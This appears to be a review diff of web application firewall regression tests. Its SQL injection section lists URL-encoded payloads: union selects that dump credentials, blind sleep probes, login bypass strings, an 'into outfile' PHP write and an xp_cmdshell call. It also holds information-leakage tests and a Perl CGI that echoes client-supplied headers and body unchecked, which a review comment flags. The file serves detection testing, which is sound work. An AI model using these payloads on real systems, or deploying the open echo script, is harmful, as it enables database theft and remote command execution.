%endtest
%test SQL Injection Attack (959070)
########################################
%output 959070
%var sig=-247%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2Cconcat_ws(0x3a%2Cversion()%2Cdatabase()%2CuseR())%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36%2C37%2C38%2C39%0A1%20having%201%3D1--
%var sig=256%20%20AND%201%3Cascii(substring((SELECT%20column_name%20FROM%20information_schema.columns%20WHERE%20table_name%20like%20char(105%2C109%2C103%2C101%2C115)%20limit%201%2C1)%2C1%2C1))
%endtest
%test SQL Injection Attack (959071)
########################################
%output 959071
%var sig=1'%20or%201%3D(SELECT%20TOP%201%20email%20FROM%20cdrequests%20where%20id%3D2000)--
%var sig=1'%20or%20'1'%3D'1%20order%20by%201--
%endtest
%test SQL Injection Attack (959072)
########################################
%output 959072
%var sig=99999999%20and%201%3D2%20union%20select%201%2Cconcat(user()%2Cchar(58)%2Cversion()%2Cchar(58)%2Cdatabase())%2C3%2C4%2F*
%var sig=-9'%20union%20select%20concat(version())%2C2%2C3%2C4%2C5%2C6%2Cand'1'%3D'1
%endtest
%test SQL Injection Attack (950908)
########################################
%output 950908
%var sig=6%20AND%20ASCII(SUBSTR((COALESCE(5%2C%20NULL))%2C%201%2C%201))%20%3E%2063
%endtest
%test SQL Injection Attack (959073)
########################################
%output 959073
%var sig=-120%20union%20all%20select%201%2Ccast(table_name%20as%20text)%20from%20information_schema.columns--
%var sig=-1100%20UNION%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2Cconcat_ws(0x2b%2Cversion()%2Cuser()%2C%40%40version_compile_os)%2C10%2C11%2C12%20--
%endtest
%test Detects blind sqli tests using sleep() or benchmark() (981272)
########################################
%output 981272
%var sig=-207%20union%20select%201%2Cconcat(%40i%3A%3D0x00%2C%40o%3A%3D0x0d0a%2Cbenchmark(23%2C%40o%3A%3DCONCAT(%40o%2C0x0d0a%2C(SELECT%20concat(table_schema%2C0x2E%2C%40i%3A%3Dtable_name)%20from%20information_schema.tables%20WHERE%20table_name%3E%40i%20order%20by%20table_name%20LIMIT%201)))%2C%40o)%2C3%2C4%2C5--
%var sig=13%20and%20sleep(3)%23
%endtest
%test Detects basic SQL authentication bypass attempts 1/3 (981244)
########################################
%output 981244
%var sig=aaa'%20or%20(1)%3D(1)%20%23!asd
%var sig=aa'%20LIKE%20md5(1)%20or%20'1
%endtest
%test Detects MSSQL code execution and information gathering attempts (981255)
########################################
%output 981255
%var sig='%20union%20select%20concat(UserId%2Cchar(58)%2CUserPassword)%20from%20users%20into%20outfile%20'content%2F1.php'%2F*
%var sig=1'%20or%201%3D(%40%40version%20)%3Bexec%20master..xp_cmdshell
%endtest
%test Detects MySQL comment-/space-obfuscated injections and backtick termination (981257)
########################################
%output 981257
%var sig=1%0bAND(SELECT%0b1%20FROM%20mysql.x)
%endtest
%test Detects chained SQL injection attempts 1/2 (981248)
########################################
%output 981248
%var sig=0%20div%201%20-%20union%23foo*%2F*bar%0Aselect%23foo%0A1%2C2%2Ccurrent_user
%endtest
%test Detects SQL benchmark and sleep injection attempts including conditional queries (981250)
########################################
%output 981250
%var sig=SELECT%20BENCHMARK(1000000%2CMD5(%E2%80%98A%E2%80%99))%3B
%var sig=SELECT%20SLEEP(5)%3B%20%23%20%3E%3D%205.0.12
%endtest
%test Detects conditional SQL injection attempts (981241)
########################################
%output 981241
%var sig=1194%20or%201%20group%20by%20concat(version()%2Cfloor(rand(0)*2))having%20min(0)%20or%201--
%endtest
%test Detects MySQL charset switch and MSSQL DoS attempts (981252)
########################################
%output 981252
%var sig=-1'%3B%20if%20'1'%3D'1'%3B%20waitfor%20time%20'00%3A00%3A01'--
%endtest
%test Detects MATCH AGAINST, MERGE, EXECUTE IMMEDIATE and HAVING injections (981256)
########################################
%output 981256
%var sig=-148)%20or%201%20group%20by%20concat(%40%40version%2Cfloor(rand(0)*2))%20having%20min(0)%20or%201%20--
%endtest
%test Detects basic SQL authentication bypass attempts 2/3 (981245)
########################################
%output 981245
%var sig=-121%20union%20all%20select%201%2Cgroup_concat(Username%2C0x3a%2CPassword%2C0x3a%2CUserGroup)%2C3%2C4%2C5%20from%20uvp_Users
%var sig=-10'%20union%20select%201%2Cconcat_ws(0x3a%2Ctable_name%2Ctable_schema)%2C3%20from%20information_schema.columns%20where%20column_name%20like%20'name'%23
%endtest
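
Review bot: The shared request at the top of the file has a truncated `Accept` header: it ends in `*/*;q=0.` where the other test files send `*/*;q=0.5`. Every test here substitutes `$sig` into that one request, so all of them send the malformed q-value; restore the `5` so a header-validation match cannot be confused with the SQL injection rule under test. It would also help to say in the `# File 41` comment that the `%request` block placed before the first `%test` is the template each test reuses, since the other files repeat the request inside every test.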

@@ -0,0 +1,140 @@
# FILE 50
%timeout 10
%test weblogic information disclosure
########################################
%event 970021
%output 970021
%request
GET /cgi-bin/testserver.cgi HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Proxy-Connection: keep-alive
Response-Status: 500 Internal Server Error
Response-Content: <title>JSP compile error</title>
%endtest
%test Zope information leakage
########################################
%event 970007
%output 970007
%request
GET /cgi-bin/testserver.cgi HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Proxy-Connection: keep-alive
Response-Content: <h2>Site Error</h2> <p>An error was encountered while publishing this resource.
%endtest
%test CF information leakage
########################################
%event 970008
%output 970008
%request
GET /cgi-bin/testserver.cgi HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Proxy-Connection: keep-alive
Response-Content: The error occurred in script.cfm: line 11 bla bla bla Please try the following: <br> Check the ColdFusion documentation to verify that you are using the correct syntax. bla bla Stack Trace (click to expand)
%endtest
%test PHP information leakage
########################################
%event 970009
%output 970009
%request
GET /cgi-bin/testserver.cgi HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Proxy-Connection: keep-alive
Response-Content: <b>Warning</b> mysql_fetch_row(): supplied argument ... in /web/jvcjazz/intl_view.php on line 142
%endtest
%test ISA server existence revealed
########################################
%event 970010
%output 970010
%request
GET /cgi-bin/testserver.cgi HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Proxy-Connection: keep-alive
Response-Content: 403 Forbidden - The ISA Server denies the specified Uniform Resource ...bla bla bla... Internet Security and Acceleration Server
%endtest
%test Local file link
########################################
%event 970011
%output 970011
%request
GET /cgi-bin/testserver.cgi HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Proxy-Connection: keep-alive
Response-Content: <a href="c:\\documents\\sensitive.doc">This is my sensitive data, do not touch</a>
%endtest
%test Microsoft office doc properties leakage
########################################
%event 970012
%output 970012
%request
GET /cgi-bin/testserver.cgi HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Proxy-Connection: keep-alive
Response-Content: <o:documentproperties>
%endtest
%test Directory Listing (apache)
########################################
%event 971200
%output 971200
%request
GET /cgi-bin/testserver.cgi HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Proxy-Connection: keep-alive
Response-Content: <html> <head> <title>Index of /~avi</title> </head> <body><h1>Index of /~avi</h1><table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr><tr><td valign="top"><img src="/icons/back.gif" alt="[DIR]"></td><td><a href="/~avi/">Parent Directory</a> </td><td>&nbsp;</td><td align="right"> - </td></tr><tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="03.17/">03.17/</a> </td><td align="right">21-Jul-2007 17:20 </td><td align="right"> - </td></tr>
%endtest
%test CF source code leakage
########################################
%event 970016
%output 970016
%request
GET /cgi-bin/testserver.cgi HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Proxy-Connection: keep-alive
Response-Content: <cf
%endtest
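
Review bot: Nothing in this file states that it depends on `/cgi-bin/testserver.cgi` echoing the `Response-Status` and `Response-Content` request headers back as the response, yet all nine tests rely on it. Add a comment under `# FILE 50` saying so, because without the CGI in place every request here fails the same way and the report will not point at the cause. Since the leak samples (for example `<title>JSP compile error</title>`) travel in a request header first, the comment should also say whether inbound rules must be in detection-only mode for the response to be generated at all. The test names omit the rule id in parentheses that the other files use, e.g. `%test Zope information leakage` rather than a name ending in `(970007)`.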

@@ -0,0 +1,18 @@
#!/usr/bin/perl
use CGI qw/:standard/;
$response_status = http('Response-Status') || "200 OK";
$response_content = http('Response-Content');
$response_type = http('Response-Content-Type') || "text/html";
$response_new_header_name = http('Response-Header-Name');
$response_new_header_value = http('Response-Header-Value');
$response_new_header = defined($response_new_header_name) ? $response_new_header_name . ': ' . $response_new_header_value : undef;
if (defined($response_new_header)) {
print header ($response_type, $response_status, undef, undef, undef, undef, undef, undef, undef,$response_new_header);
} else {
print header ($response_type, $response_status);
}
print start_html('rule set tester');
print h1('rule set tester');
print $response_content;
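
Review bot: `print $response_content;` and the two `header (...)` calls emit whatever the client sends in `Response-Content`, `Response-Status`, `Response-Content-Type` and `Response-Header-Name`/`Response-Header-Value`, with no check on who is asking, so once this script is copied to `/cgi-bin` any client that can reach it controls the status, one response header and the body served from this host. Gate it, for example by answering only when `REMOTE_ADDR` is the loopback address or a test-mode flag is set, and have the installation notes say it should be removed after the run. Smaller points: there is no `use strict; use warnings;`, `start_html` is never paired with `end_html`, and the positional `header` call padded with seven `undef`s would read better with named parameters.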